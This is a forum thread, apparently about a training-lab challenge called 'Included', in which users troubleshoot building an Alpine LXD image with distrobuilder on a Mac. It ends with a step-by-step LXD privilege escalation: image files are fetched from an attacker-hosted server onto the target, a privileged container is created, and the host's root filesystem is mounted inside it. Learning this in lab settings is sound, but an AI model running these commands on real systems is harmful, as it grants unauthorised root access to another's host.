I’m trying to complete the ‘Included’ challenge on my Mac and I’m having trouble building the alpine linux image for x86. I had a problem building 3.8 for my native architecture but 3.9 worked okay. But I can’t get it to build for x86.
Here’s the error I get:
Error: Failed to manage packages: Failed to refresh: fork/exec /sbin/apk: no such file or directory
ERROR [2023-07-31T01:49:45-04:00] Failed running distrobuilder err=“Failed to manage packages: Failed to refresh: fork/exec /sbin/apk: no such file or directory”
I couldn’t get it to build the x86_64 image. I finally broke down and did the challenge on my arm64 machine. I guess another way I could have done it was using PwnBox. I find the user experience much better on my Mac though so this was kind of a bummer.
It seems like you are encountering an error related to the apk package manager while trying to build an Alpine Linux image for x86 architecture using distrobuilder. The error message indicates that the apk command is not found or not accessible during the build process.
I’m not sure what apk is or where to find it. ‘apt-file list apk’ turns up nothing. I even used some regex expressions to try to find it. Nothing. So, what the ■■■■ is apk?
Update: I did some Googling. It turns out APK stands for Alpine Package Keeper. I found something here: Download pulls wrong architecture · Issue #314 · lxc/distrobuilder · GitHub . It seems like distrobuilder just isn’t built to allow building for a non-native architecture. The suggested fix is to use qemu. Bummer.
The easiest way I found was to log into the pwn box and recreate the steps I did on my M1 machine.
The pwn box opens in a new tab in the browser, so it wasn’t so bad. If anything, it helped with some reinforcement learning re-tracing the steps I had already covered
Steps to get working LXC image from Canonical repo
# Get the images via wget
# -- NOTE: can do this on the target machine, or on attacker machine
# and then transfer it over via python3 http server.
# See below
wget https://images.lxd.canonical.com/images/alpine/3.18/amd64/default/20241124_0023/lxd.tar.xz .
wget https://images.lxd.canonical.com/images/alpine/3.18/amd64/default/20241124_0023/rootfs.squashfs .
# -- OPTIONAL: get these from attacker machine
# Serve the directory with Python3
python3 -m http.server 8080
# On target machine -- Get the files
wget ${attackerIp}/lxd.tar.xz
wget ${attackerIp}/rootfs.squashfs
# -- IMPORT LXC IMAGE
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
Exploitation:
# Add privleged mode
lxc init alpine privesc -c security.privileged=true
# Mount the root disk
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
# Run the container
lxc start privesc
lxc exec privesc /bin/sh